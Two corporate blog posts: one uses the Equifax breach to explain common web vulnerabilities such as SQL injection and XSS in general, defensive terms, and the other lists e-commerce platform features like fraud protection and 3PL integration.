Equifax Breach Shines Light on Common Web Vulnerabilities

If you’ve been living off the grid or hunkered down to avoid the wrath of mother nature, you might have missed the big news from last week. Equifax, one of the big 3 credit reporting entities in the United States, reported a security breach of epic proportions.

The breach involved Personally Identifiable Information (PII) for roughly 143 million people in the US alone, or close to 1 in every two people. Data lost included names, birth dates, and addresses, but also extended to social security numbers, credit card numbers, and in some cases driver’s license numbers.

To exacerbate the problem, Equifax’s handling of the response and notification has also consumers and experts alike concerned with their ability to address the issue. In fact, the incident is so severe, and the management of it so questionable, the House Financial Services Committee will be holding hearings to gain a better understanding of what this means to consumers and the country.

What might be the most damning, however, is how the breach occurred. Currently, signs point to Equifax having fallen to one of the most common security vulnerabilities known – a SQL injection.

Yet, while a company entrusted with the wealth of personal information that Equifax had stored on consumers should have taken greater precautions, hacks like these are called common for a reason. Many companies fall prey to them. Others don’t even know they should be testing for them. And still, more rely on a single point of failure – a developer – to be the one to hold back the tide of hackers trying to get at your company’s data.

So, what are the most common web vulnerabilities your company should be looking for? And how do you effectively, and consistently, ensure the security of your data?

Top 5 Common Web Vulnerabilities

While not a complete list, these are some of the most common – and therefore, serious –  vulnerabilities in web applications.

Authentication Issues and Session Management

HTTP does not provide functionality for user authentication and session tracking, so this must be handled by the web applications. Because of this, developers must be vigilant to ensure that session data is encrypted at all times, otherwise, it provides opportunities for hackers to hijack a user’s session during an active session.

Cross-site Request Forgery

With a cross-site request forgery, a third-party site attempts to request access to a web application that a user is already authenticated to. Examples are social media sites, financial institutions (banks, credit cards sites), and email clients. Once access is obtained, the malicious site can then access functionality on the authenticated site, wreaking havoc on bank accounts and through email.

Security Misconfigurations

With the complexity of applications that are part of a web application ecosystem, it’s important that users and processes have the minimum security access that they need to get done their intended tasks. Unfortunately, either because of a lack of resource training or through systems allowing access to more data than is needed, processes and accounts may be able to see data or perform actions that they should have access to. Because of this, a malevolent user, or someone who can access a user or process account, can perform harmful actions that they shouldn’t be able to otherwise gain access to.

XSS – Cross-Site Scripting

Validation is an important part of user submitted data when it comes to the security of your application. In a cross-site scripting attack, client-side scripts are injected into a site and can execute on pages that are dynamically generated leveraging user-supplied data can be at risk if the information isn’t validated. As a result, users can be redirected to a malicious site that appears like the original site or their sessions can be hijacked.

SQL Injections

It’s believed that a SQL injection is what was used in the Equifax breach. Like a cross-site scripting vulnerability, SQL injection can occur when data coming into the site is not validated. In these cases, user-supplied data is input into a web application, but without data validation, a malignant SQL query and commands can be passed directly into the database. Equifax isn’t the only large company that has fallen victim to a SQL injection attack. The PlayStation breach of 2011 was also caused by SQL injection.

Strategies for Protecting Your Data from Common Web-based Threats

The good news is that most of the most common attacks are easily taken care of with education, testing, and consistency.

Developers, system administrators, and security staff should be well-trained to be aware of best practice for web application security. Knowing when encryption should be used on data, and how to minimize exposure to data through access control, can reduce system exposure to outside entities.

Education can also ensure that data cannot be injected into the site through foreign scripts or malicious SQL code passed through web application form elements. When developers are taught to limit form inputs and validate data, at least one attack vector is minimized.

But the entire burden shouldn’t be placed on the shoulders of the developers. While application testing is done, boundary testing – in other words, testing beyond what the expected use of an application is – can identify areas of potential vulnerability.

Beyond the areas of education and standards, though, regular full site testing can be invaluable. Penetration testing on applications that have access to sensitive data can inform improvements that need to be performed to secure your site. While internal teams can perform regular penetration tests, periodic testing and security audits by an outside partner can provide invaluable insights that might otherwise be overlooked.

Simple oversights in web application security can have devastating results, as the Equifax breach has shown. A common vulnerability can be easily exploited by hackers and cause life altering effects on millions. But even if your company doesn’t deal with the same level of sensitive data, you have a responsibility to your users and the enterprise to protect the data stored on your systems. Vigilance, education, and awareness are the greatest tools at your disposal to protect your organization from outside attacks.

The post Equifax Breach Shines Light on Common Web Vulnerabilities originally appeared on the Curotec Blog

4 E-Commerce Feature You Didn’t Know You Needed

E-commerce continues to grow at a rapid pace. If you’re thinking about starting an online storefront or adding the ability to purchase your products online in addition to a brick and mortar store, you’ve probably already considered some of the most common features that you’ll need.

Some of these features may include an easy way to add new products, the ability to quickly set up your storefront, the ability to set up sales and specials, store analytics, and integrations with payment providers.

But there are features that you may not be considering that can be just as important as the ability to import your products. Below we’ve called out 4 e-commerce features that you may not have thought of, but that can take your business to the next level.

 

An Extensible E-commerce Platform

When you first set up your e-commerce site, it may seem like the platform you’ve chosen has everything you’ll ever need. But you should take a step back and review what your company might need in the future, or at the very least understand that what you need today might not be what your customers will demand from you tomorrow.

Since it’s unlikely that you have a crystal ball to know what that might be, your insurance against your needs outgrowing your platform is to choose one that is extensible.

What does that mean? It means that you’ll be able to add functionality to your platform without having to bring in an expert to make significant changes to the core of your e-commerce platform. This not only allows you to add functionality as it becomes relevant, such as fraud protection, mentioned below, and customer service software, it also allows you to respond to your market as the needs of your customer base change. Additionally, it can allow you to amp up the security on your site by adding new innovations as they become available.

 

Open Source E-commerce Implementation

While having a site that is extensible means you can add pre-built components to grow your business and your platform’s functionality, choosing an open source e-commerce solution means that you can make your storefront into anything you want, with a little help from a knowledgeable technology partner.

Because open source software provides the code that makes up the platform’s functionality available, a skilled technology partner can help you change or add functionality to your storefront that may not exist otherwise. If you’ll need specialized functions to make your storefront the best it can be, going open source can be the most robust means of ensuring you get exactly what you want.

Remember, though – open source may not mean free. Some companies still charge for their platform, but once you are a licensed user you have access to the underlying code.

 

Integration with Fraud Protection

Payment processing is a no brainer for an e-commerce site. But with e-commerce fraud on the rise – fraud rates in 2016 were 33% higher than those a year earlier – you need to consider protecting those purchases as much as being able to accept them.

E-commerce sites typically leverage the Card Verification Value (CVV), located on the back of the credit or debit card, as a step toward ensuring a transaction is valid. But CVV verification is only a first step toward fraud prevention.

Outside services, like ClearSale, provide modules that can be used with various e-commerce platforms that can help verify the validity of a charge as well as identify the likelihood that a particular transaction may get charged back – something known as “friendly fraud”.

 

Ability to Connect to a 3PL

As your business grows, your ability to manage inventory, order fulfillment, and shipping management, along with your business will diminish. It’s at this point that many e-commerce retailers look to 3PLs for assistance with the inventory and order fulfillment needs.

A 3PL – or third-party logistics provider – can manage these elements of your business for you, providing you with benefits like reduced shipping time and cost, updated and streamlined warehouse procedures, and inventory adaptation and management based on demand.

However, adding a 3PL to your online retail business will provide fewer positives to your business if you need to manage orders directly. Instead, a direct integration to your 3PL will allow orders coming in from your website to flow seamlessly into your order fulfillment systems with your third-party logistics provider.

If you’re just starting out in the online retail space, some of these concerns may seem far reaching. But as your business grows, you’ll be glad you took the time to plan for expansion. Overhauling your e-commerce site shortly after setting it up is a frustrating experience and one that can be avoided when you consider a few additional features that will free to you to grow and build your business.

The post 4 E-Commerce Feature You Didn’t Know You Needed originally appeared on the Curotec Blog